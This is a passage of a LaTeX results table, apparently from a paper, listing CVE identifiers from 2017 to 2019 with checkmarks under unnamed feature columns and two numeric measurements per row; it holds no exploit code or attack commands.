& \checkmark & & \checkmark & & & \checkmark & \checkmark & & & & \checkmark & & & 3.71 & 0.05\\ \midrule +CVE-2017-16615 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & \checkmark & & & \checkmark & & & 2.01 & 0.04\\ \midrule +CVE-2017-16616 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & \checkmark & & & 2.88 & 0.04\\ \midrule +CVE-2017-16618 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & & \checkmark & & & 2.38 & 0.04\\ \midrule +CVE-2017-16876 & \checkmark & & & \checkmark & \checkmark & & & & & & & & & & & & & 3.37 & 0.07\\ \midrule +CVE-2017-16877 & & & & \checkmark & & & & & & & \checkmark & & & & & & & 5.23 & 0.24\\ \midrule +CVE-2017-16880 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & 1.8 & 0.16\\ \midrule +CVE-2017-17042 & & & & \checkmark & \checkmark & & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & 2.08 & 0.19\\ \midrule +CVE-2017-18239 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & \checkmark & & & 22.78 & 0.08\\ \midrule +CVE-2017-18367 & & & & \checkmark & \checkmark & & & & & & \checkmark & & & & & & & 5.5 & 0.05\\ \midrule +CVE-2017-1000188 & & & & \checkmark & \checkmark & & & & & & & \checkmark & & & & & & 2.63 & 0.23\\ \midrule +CVE-2017-1000189 & & & & \checkmark & \checkmark & & & & & & & \checkmark & & & & & & 2.18 & 0.19\\ \midrule +CVE-2017-1000228 & & & & \checkmark & \checkmark & & & & & & & & & & & & & 1.62 & 0.17\\ \midrule +CVE-2017-1000389 & & & & & \checkmark & & & \checkmark & & & \checkmark & & & & & & & 5.95 & 4.53\\ \midrule +CVE-2017-1000451 & & & & & & & & \checkmark & & & \checkmark & \checkmark & & & & & & 6.85 & 5.45\\ \midrule +CVE-2017-1000486 & & & & \checkmark & \checkmark & & & & & & & & & & & & & 2.96 & 0.17\\ \midrule +CVE-2017-1000487 & & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & \checkmark & & & & & & 3.95 & 0.02\\ \midrule +CVE-2017-1000491 & & & & \checkmark & \checkmark & & & & & \checkmark & & & & & & & \checkmark & 4.82 & 2.45\\ \midrule +CVE-2017-1001002 & & & & \checkmark & \checkmark & & & \checkmark & & & \checkmark & \checkmark & & & & & & 3.8 & 0.53\\ \midrule +CVE-2017-1001003 & & & & \checkmark & \checkmark & & & \checkmark & & \checkmark & \checkmark & \checkmark & & & & & & 2.98 & 0.67\\ \midrule +CVE-2017-1001004 & & & & \checkmark & \checkmark & & & & \checkmark & & \checkmark & \checkmark & & & & & & 1.82 & 0.04\\ \midrule +CVE-2017-1002150 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & & & & & 1.76 & 0.15\\ \midrule +CVE-2018-1098 & & & \checkmark & & \checkmark & & & & & & \checkmark & \checkmark & & & \checkmark & & & 3.35 & 0.21\\ \midrule +CVE-2018-1099 & & & \checkmark & \checkmark & \checkmark & & & & \checkmark & & \checkmark & \checkmark & & & \checkmark & & & 21.57 & 16.61\\ \midrule +CVE-2018-1196 & & & & & & & & \checkmark & & \checkmark & \checkmark & & & & \checkmark & & & 6.25 & 1.05\\ \midrule +CVE-2018-1261 & & & & & \checkmark & & \checkmark & & & & \checkmark & & & & & & & 26.65 & 25.01\\ \midrule +CVE-2018-1263 & & & & & \checkmark & & \checkmark & & & & \checkmark & \checkmark & & & & & & 15.42 & 13.67\\ \midrule +CVE-2018-1309 & & \checkmark & \checkmark & & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & \checkmark & \checkmark & & 26.19 & 21.24\\ \midrule +CVE-2018-1320 & & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & \checkmark & & \checkmark & & 28.76 & 16.5\\ \midrule +CVE-2018-3712 & & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & & & & \checkmark & & & 2.22 & 0.15\\ \midrule +CVE-2018-3714 & & & & & \checkmark & & & & & & \checkmark & \checkmark & & & \checkmark & & & 1.38 & 0.05\\ \midrule +CVE-2018-3715 & & & & \checkmark & & & & & & & \checkmark & \checkmark & & & & & & 1.57 & 0.19\\ \midrule +CVE-2018-3721 & & & & \checkmark & \checkmark & & & & & & \checkmark & & & & & & & 4.04 & 0.18\\ \midrule +CVE-2018-3726 & & & & \checkmark & \checkmark & & & & & & \checkmark & & & & & & & 1.47 & 0.1\\ \midrule +CVE-2018-3731 & & & & & \checkmark & & & \checkmark & & & \checkmark & & & & & & & 1.9 & 0.05\\ \midrule +CVE-2018-3732 & & & & \checkmark & & & & & & & \checkmark & & & & & & & 1.65 & 0.08\\ \midrule +CVE-2018-3733 & & & & \checkmark & \checkmark & & & & & & & & & & & & & 1.46 & 0.1\\ \midrule +CVE-2018-3738 & & & & & & & & & \checkmark & & \checkmark & \checkmark & & & & & & 4.26 & 2.49\\ \midrule +CVE-2018-3740 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & \checkmark & & & 4.0 & 0.16\\ \midrule +CVE-2018-3741 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & \checkmark & & & & & & & 2.34 & 0.09\\ \midrule +CVE-2018-3750 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & \checkmark & & & & & & & 2.83 & 0.09\\ \midrule +CVE-2018-3759 & & & & \checkmark & \checkmark & & & & \checkmark & \checkmark & \checkmark & & & & & & & 1.37 & 0.07\\ \midrule +CVE-2018-3769 & & & \checkmark & \checkmark & \checkmark & & & & \checkmark & & \checkmark & \checkmark & \checkmark & & \checkmark & & & 2.81 & 0.03\\ \midrule +CVE-2018-3774 & & & & \checkmark & \checkmark & & & & & & & \checkmark & & & & & & 2.64 & 0.07\\ \midrule +CVE-2018-3778 & & & \checkmark & \checkmark & \checkmark & & & & & \checkmark & & & \checkmark & & \checkmark & & & 3.85 & 0.08\\ \midrule +CVE-2018-3786 & & & \checkmark & \checkmark & \checkmark & & & & & & & \checkmark & & & \checkmark & & & 2.68 & 0.19\\ \midrule +CVE-2018-5968 & & & \checkmark & \checkmark & \checkmark & & \checkmark & & & \checkmark & & & \checkmark & & \checkmark & & & 5.87 & 0.17\\ \midrule +CVE-2018-6333 & & & & \checkmark & \checkmark & & & & \checkmark & \checkmark & \checkmark & & & & & & & 2.46 & 0.16\\ \midrule +CVE-2018-6591 & & & & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & 3.95 & 0.45\\ \midrule +CVE-2018-7260 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & 3.46 & 0.16\\ \midrule +CVE-2018-7408 & & & \checkmark & \checkmark & & & & \checkmark & \checkmark & \checkmark & \checkmark & & \checkmark & & \checkmark & & & 4.22 & 0.17\\ \midrule +CVE-2018-7560 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & \checkmark & & & & & & 1.73 & 0.02\\ \midrule +CVE-2018-7576 & & & & & & & & & & & \checkmark & & & & & & & 360.42 & 31.43\\ \midrule +CVE-2018-7651 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & & \checkmark & & & 2.61 & 0.3\\ \midrule +CVE-2018-7753 & & & \checkmark & \checkmark & \checkmark & & & & & & & & & & \checkmark & & & 4.46 & 0.17\\ \midrule +CVE-2018-8013 & & \checkmark & & & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & \checkmark & & 22.69 & 17.85\\ \midrule +CVE-2018-8016 & & \checkmark & & \checkmark & & & & \checkmark & \checkmark & \checkmark & & & & \checkmark & & \checkmark & & 4.77 & 0.17\\ \midrule +CVE-2018-8128 & \checkmark & & & & \checkmark & & & & & & \checkmark & & & & & & & 7.64 & 0.18\\ \midrule +CVE-2018-8177 & \checkmark & & & & \checkmark & & & & & & \checkmark & & & & & & & 8.43 & 0.42\\ \midrule +CVE-2018-8178 & \checkmark & & & & \checkmark & & & & & & \checkmark & \checkmark & & & & & & 24.18 & 0.28\\ \midrule +CVE-2018-8381 & \checkmark & & & & \checkmark & & & & & & \checkmark & & & & & & & 27.66 & 25.47\\ \midrule +CVE-2018-8390 & \checkmark & & & & \checkmark & & & & & \checkmark & \checkmark & & & & & & & 24.52 & 22.32\\ \midrule +CVE-2018-9109 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & \checkmark & \checkmark & & & & & & 5.12 & 0.28\\ \midrule +CVE-2018-9110 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & \checkmark & \checkmark & & & & & & 4.16 & 0.31\\ \midrule +CVE-2018-9206 & & & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & \checkmark & & & \checkmark & & \checkmark & 5.34 & 1.43\\ \midrule +CVE-2018-10092 & \checkmark & & & \checkmark & \checkmark & & & & & \checkmark & & & & & & & & 4.95 & 0.17\\ \midrule +CVE-2018-10094 & \checkmark & & & \checkmark & \checkmark & & & & & & & & & & & & & 4.99 & 0.2\\ \midrule +CVE-2018-10095 & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & \checkmark & & & & & & & & 6.14 & 0.25\\ \midrule +CVE-2018-10188 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & \checkmark & & & 2.03 & 0.16\\ \midrule +CVE-2018-10366 & & & & \checkmark & & & & & & & & & & & & & & 1.4 & 0.05\\ \midrule +CVE-2018-10903 & & & \checkmark & \checkmark & \checkmark & & & \checkmark & \checkmark & & & & & & \checkmark & & & 3.7 & 0.17\\ \midrule +CVE-2018-10936 & \checkmark & & & \checkmark & & & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 2.16 & 0.15\\ \midrule +CVE-2018-11093 & \checkmark & & & & \checkmark & & & & & & \checkmark & \checkmark & & & & & & 8.58 & 6.55\\ \midrule +CVE-2018-11771 & & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & & & & & \checkmark & & 12.81 & 0.17\\ \midrule +CVE-2018-11798 & & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & & & & & & & 4.76 & 0.19\\ \midrule +CVE-2018-12043 & & & & \checkmark & \checkmark & & \checkmark & & & \checkmark & \checkmark & & & & & & & 1.43 & 0.08\\ \midrule +CVE-2018-12418 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & \checkmark & & & & \checkmark & & & 3.16 & 0.15\\ \midrule +CVE-2018-12541 & \checkmark & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & \checkmark & & & & \checkmark & & & 9.95 & 0.16\\ \midrule +CVE-2018-12557 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & & & & & 3.21 & 0.17\\ \midrule +CVE-2018-12615 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & 2.11 & 0.16\\ \midrule +CVE-2018-12976 & \checkmark & & & \checkmark & \checkmark & & & \checkmark & & & & & & & & & & 1.51 & 0.06\\ \midrule +CVE-2018-13447 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 2.66 & 0.16\\ \midrule +CVE-2018-13448 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 2.65 & 0.27\\ \midrule +CVE-2018-13449 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 2.81 & 0.28\\ \midrule +CVE-2018-13450 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 2.87 & 0.28\\ \midrule +CVE-2018-13797 & & & \checkmark & \checkmark & \checkmark & & & & \checkmark & & \checkmark & \checkmark & \checkmark & & \checkmark & & & 4.63 & 0.22\\ \midrule +CVE-2018-13818 & & & & \checkmark & & & & & & & & & & & & & & 3.21 & 0.19\\ \midrule +CVE-2018-14041 & & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & \checkmark & & & & & & 5.64 & 0.17\\ \midrule +CVE-2018-14718 & & & \checkmark & \checkmark & \checkmark & & \checkmark & & & \checkmark & & & \checkmark & & \checkmark & & & 20.78 & 0.17\\ \midrule +CVE-2018-14719 & & & \checkmark & \checkmark & \checkmark & & \checkmark & & & \checkmark & & & \checkmark & & \checkmark & & & 17.2 & 0.28\\ \midrule +CVE-2018-14720 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & & \checkmark & & \checkmark & & & 15.12 & 0.26\\ \midrule +CVE-2018-14721 & & & \checkmark & \checkmark & \checkmark & & \checkmark & & & \checkmark & & & \checkmark & & \checkmark & & & 3.84 & 0.18\\ \midrule +CVE-2018-14840 & & & \checkmark & \checkmark & \checkmark & & & & & \checkmark & & & \checkmark & & \checkmark & & & 2.12 & 0.21\\ \midrule +CVE-2018-15178 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & & \checkmark & & & 2.75 & 0.05\\ \midrule +CVE-2018-15531 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & \checkmark & & & & & & 2.04 & 0.08\\ \midrule +CVE-2018-16329 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & \checkmark & 5.37 & 2.6\\ \midrule +CVE-2018-16459 & & & & & \checkmark & & & & & \checkmark & \checkmark & & & & & & & 7.33 & 5.9\\ \midrule +CVE-2018-16462 & & & & & \checkmark & & & & & & & & & & & & & 16.71 & 15.01\\ \midrule +CVE-2018-16470 & \checkmark & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & & & & \checkmark & & & 3.06 & 0.17\\ \midrule +CVE-2018-16472 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & 3.54 & 0.03\\ \midrule +CVE-2018-16490 & & & & & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & & & & & 2.26 & 0.06\\ \midrule +CVE-2018-16492 & & & & \checkmark & \checkmark & & & \checkmark & & & \checkmark & & & & & & & 3.28 & 0.07\\ \midrule +CVE-2018-17104 & & & \checkmark & \checkmark & \checkmark & & & & & \checkmark & \checkmark & & \checkmark & & \checkmark & & & 3.14 & 0.18\\ \midrule +CVE-2018-17187 & & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & \checkmark & & \checkmark & & 4.64 & 0.17\\ \midrule +CVE-2018-17193 & & \checkmark & \checkmark & & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & \checkmark & \checkmark & \checkmark & & 3.09 & 0.13\\ \midrule +CVE-2018-17194 & & \checkmark & \checkmark & & \checkmark & & & \checkmark & & \checkmark & \checkmark & & & & \checkmark & \checkmark & & 7.66 & 2.87\\ \midrule +CVE-2018-17195 & & \checkmark & \checkmark & & \checkmark & & & & \checkmark & & \checkmark & & & & \checkmark & \checkmark & & 5.47 & 0.2\\ \midrule +CVE-2018-17419 & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & & \checkmark & & & & \checkmark & & & 5.78 & 0.2\\ \midrule +CVE-2018-18389 & & & & \checkmark & \checkmark & & \checkmark & & & \checkmark & \checkmark & & & & & & & 3.3 & 0.17\\ \midrule +CVE-2018-18476 & & & \checkmark & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & \checkmark & & & 2.18 & 0.05\\ \midrule +CVE-2018-19048 & & & & \checkmark & & & & \checkmark & & & & \checkmark & & & & & & 3.05 & 0.05\\ \midrule +CVE-2018-19184 & & & & \checkmark & & & \checkmark & & & & & & & & \checkmark & & & 2.8 & 0.18\\ \midrule +CVE-2018-19360 & & & \checkmark & \checkmark & \checkmark & & \checkmark & & & \checkmark & & & & & \checkmark & & & 11.67 & 5.23\\ \midrule +CVE-2018-19361 & & & \checkmark & \checkmark & \checkmark & & \checkmark & & & \checkmark & & & & & \checkmark & & & 10.33 & 4.94\\ \midrule +CVE-2018-19362 & & & \checkmark & \checkmark & \checkmark & & \checkmark & & & \checkmark & & & & & \checkmark & & & 9.89 & 4.86\\ \midrule +CVE-2018-19992 & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & & & & & & & 26.12 & 23.89\\ \midrule +CVE-2018-19993 & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & & & & 18.17 & 14.11\\ \midrule +CVE-2018-19994 & \checkmark & & & \checkmark & \checkmark & & & & & \checkmark & & & & & & & & 28.2 & 26.81\\ \midrule +CVE-2018-20028 & \checkmark & & & & \checkmark & & & & & & \checkmark & & & & & & & 25.86 & 24.18\\ \midrule +CVE-2018-20059 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & & \checkmark & & \checkmark & & & 2.04 & 0.05\\ \midrule +CVE-2018-20433 & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & \checkmark & & & & & & 4.28 & 0.08\\ \midrule +CVE-2018-20594 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & & & & \checkmark & & & 1.64 & 0.16\\ \midrule +CVE-2018-20595 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & \checkmark & & & 2.28 & 0.17\\ \midrule +CVE-2018-20677 & & & \checkmark & \checkmark & \checkmark & & & & \checkmark & & \checkmark & \checkmark & \checkmark & & \checkmark & & & 8.0 & 0.31\\ \midrule +CVE-2018-20801 & & & & \checkmark & & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 11.88 & 8.83\\ \midrule +CVE-2018-20835 & & & & \checkmark & \checkmark & & & & & & \checkmark & & & & & & & 2.08 & 0.08\\ \midrule +CVE-2018-20962 & & & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & \checkmark & & & \checkmark & & & 3.81 & 0.17\\ \midrule +CVE-2018-1000013 & & & & & \checkmark & & & \checkmark & & & \checkmark & & & & & & & 1.86 & 0.16\\ \midrule +CVE-2018-1000014 & & & & & \checkmark & & & \checkmark & & & \checkmark & & & & & & & 10.66 & 9.3\\ \midrule +CVE-2018-1000089 & & & & \checkmark & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & 2.14 & 0.3\\ \midrule +CVE-2018-1000119 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 8.93 & 4.86\\ \midrule +CVE-2018-1000129 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & & \checkmark & & & & & & 9.92 & 7.96\\ \midrule +CVE-2018-1000134 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & & 16.44 & 12.73\\ \midrule +CVE-2018-1000164 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & & \checkmark & & & & \checkmark & & & 3.53 & 0.16\\ \midrule +CVE-2018-1000518 & & & & \checkmark & \checkmark & & & & & \checkmark & & \checkmark & & & & & & 2.6 & 0.16\\ \midrule +CVE-2018-1000525 & & & \checkmark & \checkmark & & & & & & \checkmark & \checkmark & & & & \checkmark & & & 6.56 & 4.59\\ \midrule +CVE-2018-1000531 & & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & \checkmark & & & 2.33 & 0.09\\ \midrule +CVE-2018-1000538 & & & \checkmark & \checkmark & \checkmark & & & & \checkmark & & \checkmark & \checkmark & & & \checkmark & & & 3.54 & 0.33\\ \midrule +CVE-2018-1000620 & & & \checkmark & \checkmark & \checkmark & & & \checkmark & & & & & & & \checkmark & & & 6.79 & 2.43\\ \midrule +CVE-2018-1000632 & & & \checkmark & \checkmark & \checkmark & & & \checkmark & & & \checkmark & & \checkmark & & \checkmark & & & 38.57 & 23.25\\ \midrule +CVE-2018-1000805 & & & \checkmark & \checkmark & \checkmark & & & & & & & & \checkmark & & \checkmark & & & 7.07 & 0.19\\ \midrule +CVE-2018-1000807 & & & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & & & & \checkmark & & & 4.52 & 0.25\\ \midrule +CVE-2018-1000808 & & & \checkmark & \checkmark & \checkmark & & & \checkmark & & & \checkmark & & & & \checkmark & & & 5.0 & 0.29\\ \midrule +CVE-2018-1000814 & & & \checkmark & \checkmark & \checkmark & & & \checkmark & & & & & & & \checkmark & & & 3.82 & 0.15\\ \midrule +CVE-2018-1000843 & & & \checkmark & \checkmark & \checkmark & & & & & \checkmark & \checkmark & & & & \checkmark & & & 10.42 & 6.43\\ \midrule +CVE-2018-1000850 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & & 3.27 & 0.06\\ \midrule +CVE-2018-1000888 & & & & \checkmark & \checkmark & & & \checkmark & & & \checkmark & & & & & & & 25.98 & 21.16\\ \midrule +CVE-2018-1002201 & & & & \checkmark & \checkmark & & & & & & \checkmark & \checkmark & & & & & & 2.94 & 0.16\\ \midrule +CVE-2018-1002207 & & & \checkmark & \checkmark & \checkmark & & & & & & \checkmark & & \checkmark & & \checkmark & & & 2.81 & 0.02\\ \midrule +CVE-2018-1002208 & & & \checkmark & & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & & & \checkmark & & & 3.29 & 0.18\\ \midrule +CVE-2018-1999024 & & & & \checkmark & & & & & & & & & & & & & & 2.03 & 0.16\\ \midrule +CVE-2019-0219 & & & & & & & & \checkmark & & \checkmark & & & & & & & & 2.75 & 0.16\\ \midrule +CVE-2019-0911 & \checkmark & & & & \checkmark & & & & & & & & & & & & & 1.92 & 0.41\\ \midrule +CVE-2019-0912 & \checkmark & & & & \checkmark & & & & & & & & & & & & & 2.0 & 0.16\\ \midrule +CVE-2019-0917 & \checkmark & & & & \checkmark & & & & & & & & & & & & & 1.81 & 0.16\\ \midrule +CVE-2019-0922 & \checkmark & & & & \checkmark & & & & & & \checkmark & & & & & & & 1.69 & 0.16\\ \midrule +CVE-2019-0924 & \checkmark & & & & \checkmark & & & & & \checkmark & & & & & & & & 1.62 & 0.16\\ \midrule +CVE-2019-0925 & \checkmark & & & & \checkmark & & & & & & & & & & & & & 1.71 & 0.18\\ \midrule +CVE-2019-0933 & \checkmark & & & & \checkmark & & & & & & & & & & & & & 1.65 & 0.16\\ \midrule +CVE-2019-1052 & \checkmark & & & & \checkmark & & & & & & & & & & & & & 2.03 & 0.16\\ \midrule +CVE-2019-1062 & \checkmark & & & & \checkmark & & & & & & \checkmark & & & & & & & 1.77 & 0.2\\ \midrule +CVE-2019-1092 & \checkmark & & & & \checkmark & & & & & & & & & & & & & 1.66 & 0.17\\ \midrule +CVE-2019-1103 & \checkmark & & & & \checkmark & & & & & & & & & & & & & 2.06 & 0.53\\ \midrule +CVE-2019-1106 & \checkmark & & & & \checkmark & & & & & \checkmark & & & & & & & & 1.72 & 0.17\\ \midrule +CVE-2019-1107 & \checkmark & & & & \checkmark & & & & & & & & & & & & & 10.62 & 0.17\\ \midrule +CVE-2019-1139 & \checkmark & & & & \checkmark & & & & & & \checkmark & & & & & & & 1.98 & 0.16\\ \midrule +CVE-2019-1195 & \checkmark & & & & \checkmark & & & & & & \checkmark & \checkmark & & & & & & 2.01 & 0.17\\ \midrule +CVE-2019-1196 & \checkmark & & & & & & & & & \checkmark & \checkmark & & & & & & & 2.14 & 0.17\\ \midrule +CVE-2019-1197 & \checkmark & & & & \checkmark & & & & & & \checkmark & & & & & & & 2.06 & 0.17\\ \midrule +CVE-2019-3564 & & & & \checkmark & \checkmark & & & & & & \checkmark & \checkmark & & & & & & 2.25 & 0.2\\ \midrule +CVE-2019-3826 & & & \checkmark & \checkmark & & \checkmark & & & & & & & \checkmark & & \checkmark & & & 10.41 & 0.65\\ \midrule +CVE-2019-5413 & & & & \checkmark & \checkmark & & & & & & \checkmark & & & & & & & 2.24 & 0.09\\ \midrule +CVE-2019-5484 & & & & \checkmark & \checkmark & & & & & \checkmark & \checkmark & \checkmark & & & & & & 2.65 & 0.1\\ \midrule +CVE-2019-5884 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & & & 4.68 & 0.2\\ \midrule +CVE-2019-6798 & & & & \checkmark & \checkmark & & & & \checkmark & \checkmark & \checkmark & \checkmark & & & & & \checkmark & 9.68 & 0.18\\ \midrule +CVE-2019-7164 & & & \checkmark & \checkmark & & & & \checkmark & \checkmark & & & & & & \checkmark & & & 4.53 & 0.17\\ \midrule +CVE-2019-7548 & & & \checkmark & \checkmark & & & & \checkmark & \checkmark & & \checkmark & & & & \checkmark & & & 11.69 & 0.26\\ \midrule +CVE-2019-7617 & & & & & \checkmark & & & \checkmark & & & \checkmark & & & & \checkmark & & & 1.82 & 0.16\\ \midrule +CVE-2019-7722 & & & \checkmark & & \checkmark & & & \checkmark & \checkmark & \checkmark & & & \checkmark & & \checkmark & & & 3.87 & 0.21\\ \midrule +CVE-2019-8331 & & & & & \checkmark & & & \checkmark & & \checkmark & \checkmark & \checkmark & & & & & & 12.46 & 0.76\\ \midrule +CVE-2019-8457 & & & & \checkmark & & & & & & \checkmark & \checkmark & & & & & & & 7.52 & 0.19\\ \midrule +CVE-2019-9212 & & & & & \checkmark & & & \checkmark & & \checkmark & \checkmark & & & & \checkmark & & & 2.26 & 0.1\\ \midrule +CVE-2019-9658 & & & \checkmark & \checkmark & \checkmark & & & & & \checkmark & \checkmark & & \checkmark & & \checkmark & & & 11.82 & 0.16\\ \midrule +CVE-2019-9844 & & & & & \checkmark & & \checkmark & \checkmark & \checkmark & & \checkmark & \checkmark & & & & & & 5.26 & 0.11\\ \midrule +CVE-2019-10077 & & & & & \checkmark & & & \checkmark & & & \checkmark & & & \checkmark & & \checkmark & & 2.82 & 0.19\\ \midrule +CVE-2019-10089 & & & & & & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & \checkmark & & 15.2 & 13.13\\ \midrule +CVE-2019-10090 & & & & & & & & \checkmark & & & \checkmark & \checkmark & & & & & & 14.22 & 12.18\\ \midrule +CVE-2019-10131 & & & & \checkmark & \checkmark & & \checkmark & & & \checkmark & & & & & & & \checkmark & 4.0 & 0.17\\ \midrule +CVE-2019-10157 & & & & \checkmark & & & & & & & & & & & & & & 2.99 & 0.13\\ \midrule +CVE-2019-10217 & & & \checkmark & \checkmark & \checkmark & & & \checkmark & & \checkmark & & & & & \checkmark & & & 9.84 & 0.18\\ \midrule +CVE-2019-10240 & & & & & \checkmark & & & & & & \checkmark & & & & \checkmark & & & 2.0 & 0.17\\ \midrule +CVE-2019-10241 & & & & \checkmark & & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & \checkmark & & & 7.79 & 0.16\\ \midrule +CVE-2019-10248 & & & \checkmark & & \checkmark & & & & & & & & & & \checkmark & & & 2.52 & 0.18\\ \midrule +CVE-2019-10642 & \checkmark & & & & \checkmark & & & \checkmark & & & & & & & & & & 1.65 & 0.17\\ \midrule +CVE-2019-10643 & \checkmark & & & & \checkmark & & & & & & \checkmark & & & & & & & 1.74 & 0.17\\ \midrule +CVE-2019-10682 & & & & \checkmark & & & & & & & \checkmark & & & & & & & 2.72 & 0.09\\ \midrule +CVE-2019-10745 & & & & & \checkmark & & & \checkmark & & & & & & & & & & 1.59 & 0.17\\ \midrule +CVE-2019-10748 & & & & & \checkmark & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & \checkmark & & & 1.94 & 0.17\\ \midrule +CVE-2019-10749 & & & & \checkmark & & & & & & \checkmark & \checkmark & & & & \checkmark & & & 1.75 & 0.18\\ \midrule +CVE-2019-10750 & & & & & \checkmark & & \checkmark & \checkmark & & & & \checkmark & & & & & & 1.65 & 0.18\\ \midrule +CVE-2019-10751 & & & & \checkmark & & & \checkmark & \checkmark & \checkmark & & \checkmark & & & & & & & 4.21 & 0.18\\ \midrule +CVE-2019-10752 & & & & \checkmark & & & \checkmark & \checkmark & & \checkmark & \checkmark & & \checkmark & & \checkmark & & & 1.78 & 0.18\\ \midrule +CVE-2019-10756 & & & & & & & \checkmark & \checkmark & & \checkmark & \checkmark & \checkmark & & & & & & 2.22 & 0.27\\ \midrule +CVE-2019-10757 & & & & & & & \checkmark & \checkmark & \checkmark & \checkmark & \checkmark & & & & \checkmark & & & 1.82 & 0.18\\ \midrule +CVE-2019-10760 & & & & & \checkmark & & & & & & \checkmark & & & & & & & 1.46 & 0.09\\ \midrule +CVE-2019-10762 & & & & \checkmark & \checkmark & & & & \checkmark & \checkmark & \checkmark & & & & & & & 1.47 & 0.08\\ \midrule +CVE-2019-10764 & & & & & \checkmark & & & \checkmark & \checkmark & & \checkmark & & & & & & & 1.92 & 0.03\\ \midrule +CVE-2019-10767 & & & & \checkmark & \checkmark & & & & & & & \checkmark & & & & & & 1.77 & 0.17\\ \midrule +CVE-2019-10776 & & & & \checkmark & \checkmark & & \checkmark & \checkmark & & & \checkmark & & & & & & & 1.73 & 0.16\\ \midrule +CVE-2019-10778 & & & & & \checkmark & & & \checkmark & & & \checkmark & \checkmark & & & & & & 1.64 & 0.12\\ \midrule +CVE-2019-10780 & & & & & 